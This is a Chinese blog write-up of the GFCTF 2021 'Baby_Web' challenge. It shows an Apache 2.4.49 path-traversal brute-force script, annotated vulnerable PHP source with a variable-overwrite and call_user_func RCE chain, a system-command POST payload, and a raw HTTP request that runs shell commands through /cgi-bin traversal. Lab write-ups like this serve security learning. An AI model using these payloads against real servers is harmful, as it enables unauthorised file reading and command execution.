<h4 id="GFCTF-2021-Baby-Web"><a href="#GFCTF-2021-Baby-Web" class="headerlink" title="[GFCTF 2021]Baby_Web"></a>[GFCTF 2021]Baby_Web</h4><p>这个题目也是apache2.4.49目录穿越漏洞</p>
<p><img src="https://cdn.jsdelivr.net/gh/Daylovef/image/image/dongman/20240415112146.png" alt="20240415112146"></p>
<p><img src="https://cdn.jsdelivr.net/gh/Daylovef/image/image/dongman/20240415112623.png" alt="20240415112623"></p>
<p>我这里发现可以任意文件读取之后就，就直接来猜这个文件叫什么名字，这里应该是cgid没有开，没办法任意命令执行</p>
<p>猜不到也可以拿字典来爆破，脚本已经写好了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line"></span><br><span class="line">file = open(&quot;综合高危.txt&quot;,&quot;r&quot;,encoding=&#x27;utf-8&#x27;).read().split(&quot;\n&quot;)</span><br><span class="line"></span><br><span class="line">for filename in file:</span><br><span class="line">    url = &quot;http://node4.anna.nssctf.cn:28633/cgi-bin/.%2e/.%2e/.%2e/.%2e/var/www/&quot;+filename+&quot;.php.txt&quot;</span><br><span class="line"></span><br><span class="line">    r  = requests.get(url=url)</span><br><span class="line">    </span><br><span class="line">    if &quot;error_reporting&quot; in r.text:</span><br><span class="line">        print(filename)</span><br><span class="line">        exit()</span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.jsdelivr.net/gh/Daylovef/image/image/dongman/20240415114230.png" alt="20240415114230"></p>
<p>要是使用我这个脚本，爆破的话，字典用的好，都能爆破出来，但是index.php.txt同样提示了我们有class.php.txt</p>
<p>审计代码发现，最起码我们得调用listdata，然后利用<code>call_user_func_array($param[&#39;name&#39;], $p);</code><br>或者<code>call_user_func($param[&#39;name&#39;]);</code><br>去进行rce</p>
<p><img src="https://cdn.jsdelivr.net/gh/Daylovef/image/image/dongman/20240415125104.png" alt="20240415125104"></p>
<p>然后我们访问<code>/template/admin/</code>这个路由得时候，正好发现这个路由调用了<code>listdata</code>函数<br><img src="https://cdn.jsdelivr.net/gh/Daylovef/image/image/dongman/20240415125003.png" alt="20240415125003"></p>
<p>访问另外一个路由发现是无效的路由<br><img src="https://cdn.jsdelivr.net/gh/Daylovef/image/image/dongman/20240415125412.png" alt="20240415125412"></p>
<p>那我们dispaly()里面的include就需要包含<code>/template/admin/</code>这个路由</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">defined(&#x27;main&#x27;) or die(&quot;no!!&quot;);</span><br><span class="line">Class Temp&#123;</span><br><span class="line">    private $date=[&#x27;version&#x27;=&gt;&#x27;1.0&#x27;,&#x27;img&#x27;=&gt;&#x27;https://www.apache.org/img/asf-estd-1999-logo.jpg&#x27;];</span><br><span class="line">    private $template;</span><br><span class="line">    public function __construct($data)&#123;</span><br><span class="line"></span><br><span class="line">        $this-&gt;date = array_merge($this-&gt;date,$data);</span><br><span class="line">    &#125;</span><br><span class="line">    public function getTempName($template,$dir)&#123;</span><br><span class="line">        if($dir === &#x27;admin&#x27;)&#123;</span><br><span class="line">            $this-&gt;template = str_replace(&#x27;..&#x27;,&#x27;&#x27;,&#x27;./template/admin/&#x27;.$template);#自动加上/template/admin/路由，并且将..替换为&#x27; &#x27;</span><br><span class="line">            if(!is_file($this-&gt;template))&#123; #template 必须是文件，那就传参index.html</span><br><span class="line">                die(&quot;no!!&quot;);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        else&#123;</span><br><span class="line">            $this-&gt;template = &#x27;./template/index.html&#x27;;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    public function display($template,$space=&#x27;&#x27;)&#123;</span><br><span class="line"></span><br><span class="line">        extract($this-&gt;date); #利用这个函数来对$template,$space来控制变量 类中变量/属性$this-&gt;date就应该是[&#x27;template&#x27;=&gt;&#x27;index.html&#x27;,&#x27;space&#x27;=&gt;&#x27;admin&#x27;]</span><br><span class="line">        $this-&gt;getTempName($template,$space); #space = admin ,template=/template/admin/</span><br><span class="line">        include($this-&gt;template);</span><br><span class="line">    &#125;</span><br><span class="line">    public function listdata($_params)&#123;</span><br><span class="line">        $system = [</span><br><span class="line">            &#x27;db&#x27; =&gt; &#x27;&#x27;,</span><br><span class="line">            &#x27;app&#x27; =&gt; &#x27;&#x27;,</span><br><span class="line">            &#x27;num&#x27; =&gt; &#x27;&#x27;,</span><br><span class="line">            &#x27;sum&#x27; =&gt; &#x27;&#x27;,</span><br><span class="line">            &#x27;form&#x27; =&gt; &#x27;&#x27;,</span><br><span class="line">            &#x27;page&#x27; =&gt; &#x27;&#x27;,</span><br><span class="line">            &#x27;site&#x27; =&gt; &#x27;&#x27;,</span><br><span class="line">            &#x27;flag&#x27; =&gt; &#x27;&#x27;,</span><br><span class="line">            &#x27;not_flag&#x27; =&gt; &#x27;&#x27;,</span><br><span class="line">            &#x27;show_flag&#x27; =&gt; &#x27;&#x27;,</span><br><span class="line">            &#x27;more&#x27; =&gt; &#x27;&#x27;,</span><br><span class="line">            &#x27;catid&#x27; =&gt; &#x27;&#x27;,</span><br><span class="line">            &#x27;field&#x27; =&gt; &#x27;&#x27;,</span><br><span class="line">            &#x27;order&#x27; =&gt; &#x27;&#x27;,</span><br><span class="line">            &#x27;space&#x27; =&gt; &#x27;&#x27;,</span><br><span class="line">            &#x27;table&#x27; =&gt; &#x27;&#x27;,</span><br><span class="line">            &#x27;table_site&#x27; =&gt; &#x27;&#x27;,</span><br><span class="line">            &#x27;total&#x27; =&gt; &#x27;&#x27;,</span><br><span class="line">            &#x27;join&#x27; =&gt; &#x27;&#x27;,</span><br><span class="line">            &#x27;on&#x27; =&gt; &#x27;&#x27;,</span><br><span class="line">            &#x27;action&#x27; =&gt; &#x27;&#x27;,</span><br><span class="line">            &#x27;return&#x27; =&gt; &#x27;&#x27;,</span><br><span class="line">            &#x27;sbpage&#x27; =&gt; &#x27;&#x27;,</span><br><span class="line">            &#x27;module&#x27; =&gt; &#x27;&#x27;,</span><br><span class="line">            &#x27;urlrule&#x27; =&gt; &#x27;&#x27;,</span><br><span class="line">            &#x27;pagesize&#x27; =&gt; &#x27;&#x27;,</span><br><span class="line">            &#x27;pagefile&#x27; =&gt; &#x27;&#x27;,</span><br><span class="line">        ];</span><br><span class="line"></span><br><span class="line">        $param = $where = [];</span><br><span class="line"></span><br><span class="line">        $_params = trim($_params);</span><br><span class="line">        # 去除字符串首尾的空白</span><br><span class="line">        $params = explode(&#x27; &#x27;, $_params);</span><br><span class="line">        if (in_array($params[0], [&#x27;list&#x27;,&#x27;function&#x27;])) &#123; # 若是第一个变量为list或者params则在前面添加action= params[0] = &#x27;function&#x27;</span><br><span class="line">            $params[0] = &#x27;action=&#x27;.$params[0]; # 但是这个地方不需要太在意，因为我们正好要构建字符 action=function</span><br><span class="line">        &#125;</span><br><span class="line">        foreach ($params as $t) &#123;</span><br><span class="line">            $var = substr($t, 0, strpos($t, &#x27;=&#x27;)); # action </span><br><span class="line">            $val = substr($t, strpos($t, &#x27;=&#x27;) + 1); # function</span><br><span class="line">            if (!$var) &#123;</span><br><span class="line">                continue;</span><br><span class="line">            &#125;</span><br><span class="line">            if (isset($system[$var])) &#123; </span><br><span class="line">                $system[$var] = $val;</span><br><span class="line">            &#125; else &#123;</span><br><span class="line">                $param[$var] = $val; </span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        // action</span><br><span class="line">        # system[&#x27;action&#x27;] = &#x27;function&#x27;</span><br><span class="line">        switch ($system[&#x27;action&#x27;]) &#123;</span><br><span class="line"></span><br><span class="line">            case &#x27;function&#x27;:</span><br><span class="line"></span><br><span class="line">                if (!isset($param[&#x27;name&#x27;])) &#123; # 存在name则hacker</span><br><span class="line">                    return  &#x27;hacker!!&#x27;;</span><br><span class="line">                &#125; elseif (!function_exists($param[&#x27;name&#x27;])) &#123;</span><br><span class="line">                    return &#x27;hacker!!&#x27;;</span><br><span class="line">                &#125;</span><br><span class="line"></span><br><span class="line">                $force = $param[&#x27;force&#x27;]; #force = false</span><br><span class="line">                if (!$force) &#123;</span><br><span class="line">                    $p = [];</span><br><span class="line">                    foreach ($param as $var =&gt; $t) &#123;</span><br><span class="line">                      #var必须为数组,且为空数组</span><br><span class="line">                        if (strpos($var, &#x27;param&#x27;) === 0) &#123;#前五个字符必须为param</span><br><span class="line">                            $n = intval(substr($var, 5)); #返回第五个字符之后的整型 然后$n需要为0，才可以去控制$p的值 </span><br><span class="line">                            $p[$n] = $t = &quot;ls /&quot;;</span><br><span class="line">                        &#125;</span><br><span class="line">                    &#125;</span><br><span class="line">                    if ($p) &#123;</span><br><span class="line"></span><br><span class="line">                        $rt = call_user_func_array($param[&#x27;name&#x27;], $p);</span><br><span class="line">                        $param[&#x27;name&#x27;] = &quot;system&quot;;</span><br><span class="line">                        $p = &quot;ls /&quot;;</span><br><span class="line">                    &#125; else &#123;</span><br><span class="line">                        $rt = call_user_func($param[&#x27;name&#x27;]);</span><br><span class="line">                    &#125;</span><br><span class="line">                    return $rt;</span><br><span class="line">                &#125;else&#123;</span><br><span class="line">                    return null;</span><br><span class="line">                &#125;</span><br><span class="line">            case &#x27;list&#x27;:</span><br><span class="line">                return json_encode($this-&gt;date);</span><br><span class="line">        &#125;</span><br><span class="line">        return null;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里写了一些自己对代码的分析，自己倒推的过程<br>但是我们可以看到我们的传参是字符串，而后我们查看&#x2F;template&#x2F;admin&#x2F;index.html路由<br><img src="https://cdn.jsdelivr.net/gh/Daylovef/image/image/dongman/20240415132729.png" alt="20240415132729"></p>
<p>我们能发现，他直接把我们的第一个参数给定死了<code>action=list</code><br>所以我们传参的时候就无法单单指利用<code>function</code>来构建<code>action=function</code>,这里我们直接构建<code>action=function</code>即可，不需要担心<code>module</code>参数，这个参数并没有利用到的地方</p>
<p>传参还要注意的地方就是<br><img src="https://cdn.jsdelivr.net/gh/Daylovef/image/image/dongman/20240415133248.png" alt="20240415133248"></p>
<p>只要新建这个类，就会直接调用<code>__construct</code>魔术方法，这样我们的<code>$_POST</code>的传参就会直接赋值给<code>$date</code></p>
<p>构建最初的payload<br>GET<code>filename=123</code><br>POST<code>template=index.html&amp;space=admin&amp;mod=123 action=function force=false name=system param=ls</code></p>
<h5 id="knowledge-1"><a href="#knowledge-1" class="headerlink" title="knowledge"></a>knowledge</h5><ul>
<li>apache2.4.49目录穿越漏洞</li>
</ul>
<p><code>/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh</code><br>如果服务端开启了cgi或cgid这两个mod的情况下，这个路径穿越漏洞将可以执行任意命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1</span><br><span class="line"></span><br><span class="line">echo; ls /</span><br></pre></td></tr></table></figure>
<ul>
<li><p>extract变量覆盖</p>
</li>
<li><p>array_merge变量覆盖</p>
</li>
<li><p>call_user_func()和call_user_func_array($param[‘name’], $p)</p>
</li>
</ul>

                
                <p class="end">__END__</p>
            </div>
            <div class="article-footer">
                <div class="suffix-box">
    <div class="suffix-box-left">
        <img src="/image/sidebar/-f128e7dd768b5.jpg" alt="懒羊羊">
    </div>
    <div class="suffix-box-right">
        <span class="suffix-box-title">文章作者：</span>懒羊羊
        <br>
        <span class="suffix-box-title">文章出处：</span><a href="/2023/03/09/CTF%E7%BB%83%E4%B9%A0/" target="_blank">NSSCTF练习</a>
        <br>
        <span class="suffix-box-title">作者签名：</span>简单地活着, 肆意又精彩.
        <br>
        <span class="suffix-box-title">关于主题：</span><a href="https://github.com/first19326/Hexo-LiveForCode" target="_blank">Hexo - Live For Code</a>
        <br>
        <span class="suffix-box-title">版权声明：</span>文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/" title="BY-NC-SA" target="_blank">BY-NC-SA</a> 许可协议，转载请注明出处
        <br>
    </div>
    <div style="clear: both;"></div>
</div>
                
                
                    <div class="tag">
                        标签：
                        
                            <a href="/tags/%E5%88%B7%E9%A2%98/">刷题</a>
                        
                    </div>
                
                <div class="article-prev-next">
                    
                        <a href="/2023/03/21/andriod%E5%BC%80%E5%8F%91/" class="prev-prefix">« </a> 上一篇：    <a href="/2023/03/21/andriod%E5%BC%80%E5%8F%91/" title="发布于 2023-03-21 12:45">andriod开发</a>
                        <br>
                    
                    
                        <a href="/2023/03/01/%E5%AE%89%E6%B4%B5%E6%9D%AF/" class="next-prefix">» </a> 下一篇：    <a href="/2023/03/01/%E5%AE%89%E6%B4%B5%E6%9D%AF/" title="发布于 2023-03-01 07:45">安洵杯</a>
                    
                </div>
            </div>
            
    <div class="article-comments">
        
            <div class="comments-title">
                评论列表
            </div>
        
        <div class="comments-content"></div>
    </div>

        </div>
    
</div>
    <div id="footer"></div>
    <div id="sidebar">
    <div class="menu-wrap" style="display:none;">
        
            <div class="menu-notice">
                <span class="iconfont icon-notice"></span>
                <div class="notice">
                    <span>简单地活着，肆意而又精彩！</span>
                </div>
            </div>
        
        <nav class="menu">
            <div class="menu-introduce"> 
                <div class="introduce-avatar">
                    <img src="/image/sidebar/-f128e7dd768b5.jpg">
                </div> 
                <div class="introduce-info"> 
                    <div class="introduce-user"><span>懒羊羊</span></div>
                </div> 
            </div> 
            <div class="menu-list">
                <ul>
                    
                        <li class=""><a href="/" class="" target="_self"><span class="iconfont icon-home-fill"></span>首页</a></li>
                    
                        <li class=""><a href="/category" class="" target="_self"><span class="iconfont icon-folder-fill"></span>分类</a></li>
                    
                        <li class=""><a href="/tag" class="" target="_self"><span class="iconfont icon-discount-fill"></span>标签</a></li>
                    
                        <li class=""><a href="/archive" class="" target="_self"><span class="iconfont icon-calendar-fill"></span>归档</a></li>
                    
                        <li class=""><a href="/donate" class="" target="_self"><span class="iconfont icon-heart-fill"></span>赞赏</a></li>
                    
                        <li class=""><a href="/about" class="" target="_self"><span class="iconfont icon-about-fill"></span>关于</a></li>
                    
                        <li class=""><a href="/atom.xml" class="" target="_blank"><span class="iconfont icon-rss"></span>订阅</a></li>
                    
                        <li class=""><a href="javascript:;" class="search" target="_self"><span class="iconfont icon-search-menu"></span>搜索</a></li>
                    
                        <li class=""><a href="/comment" class="" target="_self"><span class="iconfont icon-comments-fill"></span>留言板</a></li>
                    
                        <li class=""><a href="/friend" class="" target="_self"><span class="iconfont icon-link"></span>友情链接</a></li>
                    
                </ul> 
            </div> 
            <div class="menu-link">
                <div class="box">
                    <div class="image-box"></div>
                </div>
                
                    <a name="知乎" href="https://zhihu.com/people/worstone-29" class="" target="_blank" data=""><span class="iconfont icon-zhihu"></span></a>
                
                    <a name="微博" href="https://weibo.com/u/5749847477" class="" target="_blank" data=""><span class="iconfont icon-weibo"></span></a>
                
                    <a name="QQ" href="javascript:;" class="image" target="_self" data="/image/sidebar/qq.png"><span class="iconfont icon-qq"></span></a>
                
                    <a name="微信" href="javascript:;" class="" target="_self" data=""><span class="iconfont icon-wechat"></span></a>
                
                    <a name="GitHub" href="https://github.com/first19326" class="" target="_blank" data=""><span class="iconfont icon-github"></span></a>
                
            </div> 
        </nav>
        <button class="menu-button-close"></button>
        <div class="morph-shape" id="morph-shape" data-morph-open="M-7.312,0H15c0,0,66,113.339,66,399.5C81,664.006,15,800,15,800H-7.312V0z;M-7.312,0H100c0,0,0,113.839,0,400c0,264.506,0,400,0,400H-7.312V0z">
            <svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" viewBox="0 0 100 800" preserveAspectRatio="none">
                <path d="M-7.312,0H0c0,0,0,113.839,0,400c0,264.506,0,400,0,400h-7.312V0z"/>
            </svg>
        </div>
    </div>
    <button class="menu-button-open">MENU</button>
    <div class="menu-cover"></div>
</div>
    <link type="text/css" rel="stylesheet" href="/css/search.css">
<script type="text/javascript" src="/js/iscroll.js"></script>
<script type="text/javascript" src="/js/instantsearch.min.js"></script>
<div class="search-window">
    <div class="search-content">
        <div class="search-content-icon">
            <i class="iconfont icon-search"></i>
        </div>
        <div id="search-input" class="search-input"></div>
    </div>

    <div class="search-scroll">
        <div class="search-result">
            <div id="search-stats" class="search-stats"></div>
            <div id="search-hits"></div>
            <div id="search-pagination" class="search-pagination"></div>
        </div>
    </div>

    <span class="search-close-icon">
        <i class="iconfont icon-close"></i>
    </span>
</div>
    <div id="tools">
    <div class="progressbar-top"></div>

    
        <link type="text/css" rel="stylesheet" href="/css/APlayer.css">
        <script type="text/javascript" src="/js/APlayer.min.js"></script>
        <script type="text/javascript" src="/js/Meting.min.js"></script>
        <meting-js id="3778678" lrcshow="false" server="netease" type="playlist" fixed="true" autoplay="false" loop="all" order="random" preload="auto" volume="0.67" mutex="true"></meting-js>
    
    
    <div class="wrap-right">
        <div class="setting">
            <div class="iconbox favorites" switch="false">
                <span class="iconfont icon-favorites"></span>
                <span class="icontext">关注</span>
            </div>
            <div class="iconbox mode">
                <div class="light">
                    <span class="iconfont icon-daymode"></span>
                    <span class="icontext">浅色模式</span>
                </div>
                <div class="dark">
                    <span class="iconfont icon-nightmode-fill"></span>
                    <span class="icontext">深色模式</span>
                </div>
            </div>
            <a href="javascript:;" target="_self" class="search">
                <div class="iconbox">
                    <span class="iconfont icon-search-menu"></span>
                    <span class="icontext">搜索</span>
                </div>
            </a>
            <div class="iconbox bottom">
                <div style="display: inline-block; transform: rotate(180deg);">
                    <span class="iconfont icon-top"></span>
                </div>
                <span class="icontext">跳至底部</span>
            </div>
        </div>
        <div class="iconbox set">
            <div style="display: inline-block;">
                <span class="iconfont icon-setting"></span>
            </div>
            <span class="icontext">设置</span>
        </div>
        <div class="iconbox top">
            <span class="iconfont icon-top"></span>
            <span class="icontext">返回顶部</span>
        </div>
    </div>
    <div class="loading"></div>
</div>
    <script>
    window.config = {
        GitHubUserName     : "Daylovef",
        GitHubRepositories : "Hexo-LiveForCode",

        User             : "懒羊羊",
        UserAvatar       : "/image/sidebar/-f128e7dd768b5.jpg",
        WebsiteStartDate : "2020-01-01",

        WebsiteTitleBlur         : "(◍´꒳`◍) FYL is my girlfriend",
        WebsiteTitleBlurTimeOut  : 500,
        WebsiteTitleFocus        : "(*´∇｀*) 欢迎回来!",
        WebsiteTitleFocusTimeOut : 1000,
        WebsiteFavicon           : "/image/website/logo.png",

        ProgressBar : {
            id       : "topProgressBar",
            color    : "#77B6FF",
            height   : "2px",
            duration : 0.2
        },

        Loading: {
            rebound : {
                tension  : 16,
                friction : 5
            },
            spinner : {
                id     : "spinner",
                radius : 90,
                sides  : 3,
                depth  : 4,
                colors : {
                    background : "#F0F0F0",
                    stroke     : "#272633",
                    base       : "",
                    child      : "#272633"
                },
                alwaysForward : true,
                restAt        : 0.5,
                renderBase    : false
            }
        },

        HomeHeaderAnimationRendered : true,
        HomeHeaderAnimation         : {
            radius      : 15,
            density     : 0.2,
            color       : "rgba(255, 255, 255, .2)",
            clearOffset : 0.3
        },

        BackAnimationRendered          : true,
        IEBrowserBackAnimationRendered : false,
        BackAnimation                  : {
            colorSaturation  : "60%",
            colorBrightness  : "50%",
            colorAlpha       : 0.5,
            colorCycleSpeed  : 5,
            verticalPosition : "random",
            horizontalSpeed  : 200,
            ribbonCount      : 3,
            strokeSize       : 0,
            parallaxAmount   : -0.2,
            animateSections  : true
        },

        HomeHeaderImage : [
            
                "/image/header/51c6d5c3154ea2f0.jpg",
            
                "/image/header/home.jpg",
            
                "/image/header/home.jpeg",
            
        ],
        HomeBannerText  : "",

        ArticleHeaderImage : [
            
                "/image/header/article.jpg",
            
        ],

        OtherBannerText : "",

        Error : {
            icon    : "icon-swimming",
            title   : "PAGE NOT FOUND",
            content : [
                
                    "很抱歉，您访问的页面不存在！",
                
                    "可能是输入地址有误或该地址已变更。",
                
            ],
            buttons : [
                
                    {
                        icon  : "icon-home",
                        text  : "返回首页",
                        href  : "/",
                        class : ""
                    },
                
            ]
        },

        MenuNotice : {
            enable : true,
            notice : "简单地活着，肆意而又精彩！",
            speed  : 20
        },
        MenuList : [
            
                {
                    name   : "首页",
                    icon   : "icon-home-fill",
                    href   : "/",
                    type   : "index",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "分类",
                    icon   : "icon-folder-fill",
                    href   : "/category",
                    type   : "category",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "标签",
                    icon   : "icon-discount-fill",
                    href   : "/tag",
                    type   : "tag",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "归档",
                    icon   : "icon-calendar-fill",
                    href   : "/archive",
                    type   : "archive",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "赞赏",
                    icon   : "icon-heart-fill",
                    href   : "/donate",
                    type   : "donate",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "关于",
                    icon   : "icon-about-fill",
                    href   : "/about",
                    type   : "about",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "订阅",
                    icon   : "icon-rss",
                    href   : "/atom.xml",
                    type   : "",
                    class  : "",
                    target : "_blank"
                },
            
                {
                    name   : "搜索",
                    icon   : "icon-search-menu",
                    href   : "javascript:;",
                    type   : "",
                    class  : "search",
                    target : "_self"
                },
            
                {
                    name   : "留言板",
                    icon   : "icon-comments-fill",
                    href   : "/comment",
                    type   : "comment",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "友情链接",
                    icon   : "icon-link",
                    href   : "/friend",
                    type   : "friend",
                    class  : "",
                    target : "_self"
                },
            
        ],
        MenuLink : [
            
                
                    {
                        name   : "知乎",
                        icon   : "icon-zhihu",
                        href   : "https://zhihu.com/people/worstone-29",
                        class  : "",
                        target : "_blank",
                        image  : ""
                    },
                
                    {
                        name   : "微博",
                        icon   : "icon-weibo",
                        href   : "https://weibo.com/u/5749847477",
                        class  : "",
                        target : "_blank",
                        image  : ""
                    },
                
                    {
                        name   : "QQ",
                        icon   : "icon-qq",
                        href   : "javascript:;",
                        class  : "image",
                        target : "_self",
                        image  : "/image/sidebar/qq.png"
                    },
                
                    {
                        name   : "微信",
                        icon   : "icon-wechat",
                        href   : "javascript:;",
                        class  : "",
                        target : "_self",
                        image  : ""
                    },
                
                    {
                        name   : "GitHub",
                        icon   : "icon-github",
                        href   : "https://github.com/first19326",
                        class  : "",
                        target : "_blank",
                        image  : ""
                    },
                
            
        ],

        FooterStyle : 2,
        BottomText  : "<div><span class='face'>ღゝ◡╹)ノ♡</span></div><div>【人生若只如初见<span><i class='iconfont icon-like-fill'></i></span>何事秋风悲画扇】</div><div>&copy; 2020-2022 WorstOne. All Rights Reserved.</div>",

        ConsoleList : [
            
                
                    [
                        
                            
                                "Based on cnblogs theme SimpleMemory.",
                            
                                "",
                            
                        
                    ],
                
                    [
                        
                            
                                "SimpleMemory Author:",
                            
                                "BNDong",
                            
                        
                    ],
                
                    [
                        
                            
                                "Theme:",
                            
                                "LiveForCode",
                            
                        
                    ],
                
            
        ],

        FontIconExtend : "",

        Donate : {
            paypal  : "",
            bitcoin : "",
            alipay  : "/image/donate/alipay.png",
            wechat  : "/image/donate/wechat.png"
        },

        Search : {
            applicationID : "010C3EANT8",
            apiKey        : "c7abab9f11b79102b9aff7fe6d41447d",
            indexName     : "Notes",
            hits          : {
                page : 10
            },
            labels        : {
                placeholder : "搜索",
                empty       : "未发现与 「${query}」 相关的内容",
                stats       : "${hits} 条相关条目，使用了 ${time} 毫秒",
            }
        }, 

        Valine : {
            switch         : true,
            el             : ".comments-content",
            appId          : "srhKtvWPQTWYKh3qX8G8M7v0-gzGzoHsz",
            appKey         : "8uVSP1q6UlALVC5igYfIfv2h",
            serverURLs     : "",
            placeholder    : "你是我一生只会遇见一次的惊喜...",
            avatar         : "mm",
            meta           : "nick,mail,link",
            requiredFields : "nick,mail",
            pageSize       : 5,
            lang           : "zh-cn",
            visitor        : true,
            enableQQ       : true
        },

        Tocbot : {
            switch                : true,
            tocSelector           : ".toc",
            contentSelector       : ".article-body",
            headingSelector       : "h1, h2, h3, h4, h5",
            headingsOffset        : 0,
            scrollSmooth          : true,
            scrollSmoothOffset    : -5,
            positionFixedSelector : ".toc",
            positionFixedClass    : "toc-fixed",
            fixedSidebarOffset    : "",
        },

        Require : {
            baseUrl     : "/js/",
            waitSeconds : 100
        },

        Music : {
            type : "Meting"
        },
        APlayer : {
            container : ".aplayer",
            fixed     : true,
            autoplay  : false,
            loop      : "all",
            order     : "random",
            preload   : "auto",
            volume    : 0.67,
            mutex     : true,
            lrcType   : 3,
            audio     : [
                
                    {
                        name   : "Endless Tears",
                        artist : "CLIFF EDGE",
                        cover  : "/music/cover/Endless Tears.jpg",
                        url    : "/music/song/Endless Tears.mp3",
                        lrc    : "/music/lrc/Endless Tears.lrc"
                    },
                
            ]
        },
        Meting : {
            id       : "3778678", 
            lrcshow  : false, 
            server   : "netease", 
            type     : "playlist", 
            fixed    : true, 
            autoplay : false, 
            loop     : "all", 
            order    : "random", 
            preload  : "auto", 
            volume   : 0.67, 
            mutex    : true
        },

        Mouse : {
            enable  : true,
            options : {
                size  : 6,
                sizeF : 24
            }
        },

        LazyLoad : {
            default : "/image/website/lazyload.svg"
        },
  
        Style : {
            aplayer          : "/css/APlayer.css",
            archive          : "/css/archive.css",
            base             : "/css/base.css",
            clipboard        : "/css/clipboard.css",
            code             : "/css/code.css",
            donate           : "/css/donate.css",
            fancybox         : "/css/jquery.fancybox.css",
            footer           : "/css/footer.css",
            iconfont         : "/iconfont/iconfont.css",
            index            : "/css/index.css",
            menuBubble       : "/css/menu-bubble.css",
            mouse            : "/css/mouse.css",
            page             : "/css/page.css",
            post             : "/css/post.css",
            search           : "/css/search.css",
            tocbot           : "/css/tocbot.css",
            valine           : "/css/valine.css"
        },

        Script: {
            aplayer          : "/js/APlayer.min.js",
            config           : "/js/require.config.js",
            index            : "/js/index.js",
            instantSearch    : "/js/instantsearch.min.js",
            iscroll          : "/js/iscroll.js",
            jQuery           : "/js/jquery-3.4.1.min.js",
            loading          : "/js/loading.js",
            meting           : "/js/Meting.min.js",
            require          : "/js/require.min.js"
        },

        Font: {
            LongCang    : "/font/LongCang.css",
            Monda       : "/font/Monda.css",
            NotoSansSC  : "/font/NotoSansSC.css",
            NotoSerifSC : "/font/NotoSerifSC.css",
            Playball    : "/font/Playball.css",
            PTMono      : "/font/PTMono.css",
            Roboto      : "/font/Roboto.css",
            RobotoSlab  : "/font/RobotoSlab.css",
            Rosario     : "/font/Rosario.css",
            UbuntuMono  : "/font/UbuntuMono.css"
        },

        Suffix : {
            about : "简单地活着, 肆意又精彩."
        },
            
        Theme : {
            url  : "https://github.com/first19326/Hexo-LiveForCode",
